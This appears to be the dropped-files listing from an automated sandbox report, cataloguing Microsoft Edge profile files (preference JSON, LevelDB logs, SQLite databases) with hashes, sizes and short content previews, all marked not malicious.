                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4d51efad-ac83-4e61-9fa1-3317c248436a.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17732), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):17734
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.483354904707707
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4J99QTryDiuabatSuypOsd+aFvrEl73CaTk9NPOAfn0SAZKNSedj9UhVK84bVJ:st4PGQSu4Osd+CDs739oNF9bGYQwnL
                                                                                                                                                                                                                                                                                                      MD5:75781F88EC34552FED9FB1ECB1D78D15
                                                                                                                                                                                                                                                                                                      SHA1:A48907C1A34AA5BD174F53D0E143BB3A438E8157
                                                                                                                                                                                                                                                                                                      SHA-256:FCD6D9559EE28ED63F7E05AB116370709DE0D1D3C5D53562588D5D27EC90E246
                                                                                                                                                                                                                                                                                                      SHA-512:DB528F724CB96EFBB7ADA2D8F343FC0BD7C0596FD6B119D5E81CD43E86177DB579F9577D9767D6789962DD0178F252131778A73CBCAF560B8658E3EFD7BE420C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\63030eca-a6a6-40fc-aded-e83659b2e206.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.561481478994447
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:8AERL0WEX7pLGLhDBW5wk2f4Vnn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPKRt2IoU:8nF0XRchDBWak2funnu1janRtceKLIpz
                                                                                                                                                                                                                                                                                                      MD5:FA6B393D860936C3D48D922A5D06C33E
                                                                                                                                                                                                                                                                                                      SHA1:D37CC77670A28622CF6FF2059BE521B152B766AC
                                                                                                                                                                                                                                                                                                      SHA-256:AF929EC27FD49F42D06CD3A6D37D2EFB554E700B8277EF9387677D6AD523C432
                                                                                                                                                                                                                                                                                                      SHA-512:A96194F7033354B20D32CF518D7BA659D9D34C23707D137EECAA5DCA7DFAE7EADCA0B5A8FD4C35720AF03B3E5AEEE471A82683B9035671A3E2D44F1B6E5E4706
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379444096550407","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379444096550407","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\75315050-523f-45f9-a3d6-52f12cd23ffb.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17895), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):17897
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.480046313370604
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4J99QTryDiuabatSuypOsd+aFvrEl73CaTk9NPOAfn0SAZKNSedj9UhVK84bVm:st4PGQSu4Osd+CDs739oNF9bGYQwq3L
                                                                                                                                                                                                                                                                                                      MD5:A95AF2A06D37D477D1D29B6F55709DD7
                                                                                                                                                                                                                                                                                                      SHA1:F00F73F80D9384E91A9AEA94FAD58E02D7AA652E
                                                                                                                                                                                                                                                                                                      SHA-256:C254FF04443C38F097D2A3DE71FF45B9FD60C78CA18C777965243A11085D9D9B
                                                                                                                                                                                                                                                                                                      SHA-512:D293697B8A94C8E1C2483B37129BBDFB31A8D3C95D1767A7D687440C9B65C792CF872603AEA0ED071F3987DD1F3E2ECAE323B79E334341D654EE697E92DE3C16
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8d2a7d92-645a-46d9-aacf-f076041c444f.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.245844312420478
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4LRUDD1N723oH+Tcwtp3hBtB2KLlb4LRkHt+q2PN723oH+Tcwtp3hBWsIFUv:x4lUDDaYebp3dFLp4lkHovVaYebp3eF2
                                                                                                                                                                                                                                                                                                      MD5:07B456480E4B4C24136E141E7188F722
                                                                                                                                                                                                                                                                                                      SHA1:E87981E7FFC388F04FF1C1BF88998991DDB388FC
                                                                                                                                                                                                                                                                                                      SHA-256:735CDA2906C60DEC83FD23CC87FCC58A5182CF3854C9D2485C22B7C2313C63AE
                                                                                                                                                                                                                                                                                                      SHA-512:8065EC7AD53328227E1E2D720054798A0D999862F57651056E39B3A31011F174367D1A4839583A23D321D4D743B825E9BD4F65D54D96203DAC2EF4AB9919D109
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.414 13b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-11:15:02.465 13b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):2163821
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.222861401021413
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:IbPMZpVzfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVzfx2mjF
                                                                                                                                                                                                                                                                                                      MD5:4F68B1DBEE4EA14C7C00829FCF780191
                                                                                                                                                                                                                                                                                                      SHA1:05A9FD6CDF493EF51BE6DF95C84FBD8B23953B65
                                                                                                                                                                                                                                                                                                      SHA-256:FD1FF705E3E45C136446763FB982810365AF02243FB4FCAF8A9920B3BC9AC6B6
                                                                                                                                                                                                                                                                                                      SHA-512:CAE2E2D5728EB58AF9AB749051022F730250418E3DF38A55F9441FF67C30A6BCA124FF64384A4CC8B024F06AD9F26456F96F1DDE5343E04E4B43A07890F20452
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.097337254685604
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4L9SwDM+q2PN723oH+Tcwt9Eh1tIFUt8s4LLwgZmw+s4LHDMVkwON723oH+Tcw+:x4LDM+vVaYeb9Eh16FUt8s4/wg/+s4TX
                                                                                                                                                                                                                                                                                                      MD5:3BB797DC1763F1F64555739982164AAE
                                                                                                                                                                                                                                                                                                      SHA1:E5D22BBC64DF7BA8B345C8A9824FF3561161109B
                                                                                                                                                                                                                                                                                                      SHA-256:C7C1DAA89D35D13E2E4C7F4E508E03F1E588DC74D38979285C1A3B51F26B31FB
                                                                                                                                                                                                                                                                                                      SHA-512:1C97CCCA325F1A6826F9807C4F1051A0BCF63B7D4EDA2EF36D8B7EBD6E0CCF5D5EAA397DB0B452F9666FCF778EBAC24F7D3B3EE5620F112691B87850DE03CED8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.339 3fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-11:15:02.341 3fc Recovering log #3.2024/12/23-11:15:02.348 3fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.097337254685604
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:x4L9SwDM+q2PN723oH+Tcwt9Eh1tIFUt8s4LLwgZmw+s4LHDMVkwON723oH+Tcw+:x4LDM+vVaYeb9Eh16FUt8s4/wg/+s4TX
                                                                                                                                                                                                                                                                                                      MD5:3BB797DC1763F1F64555739982164AAE
                                                                                                                                                                                                                                                                                                      SHA1:E5D22BBC64DF7BA8B345C8A9824FF3561161109B
                                                                                                                                                                                                                                                                                                      SHA-256:C7C1DAA89D35D13E2E4C7F4E508E03F1E588DC74D38979285C1A3B51F26B31FB
                                                                                                                                                                                                                                                                                                      SHA-512:1C97CCCA325F1A6826F9807C4F1051A0BCF63B7D4EDA2EF36D8B7EBD6E0CCF5D5EAA397DB0B452F9666FCF778EBAC24F7D3B3EE5620F112691B87850DE03CED8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:02.339 3fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-11:15:02.341 3fc Recovering log #3.2024/12/23-11:15:02.348 3fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4628023887711355
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu6hlhW:TouQq3qh7z3bY2LNW9WMcUvBu6hbW
                                                                                                                                                                                                                                                                                                      MD5:9E52C1F9037D7CE870DA9C16DB5F6263
                                                                                                                                                                                                                                                                                                      SHA1:6161B753CE92E14160F9691871FDBE07A3696384
                                                                                                                                                                                                                                                                                                      SHA-256:A969D61A8461078E02B3D993982583DA6D994461B1B384C3DD6F0D4AAA46A9A9
                                                                                                                                                                                                                                                                                                      SHA-512:4821FA19C48B56362082846004A52855414597B1921B710FF4F93AF885FA4BA8CFB17D4974730ED030101DE866729DEC9E1A938D9F26E9251AA0AB98EC157727
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2229665746316725
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHtQ+q2PN723oH+TcwtnG2tMsIFUt8sOHgFkSgZmw+sOHgFkSQVkwON723oH+TR:xaHvVaYebn9GFUt8sagS/+sage5OaYeV
                                                                                                                                                                                                                                                                                                      MD5:B13FA7169E3CB56ABF801D5986A3EFB7
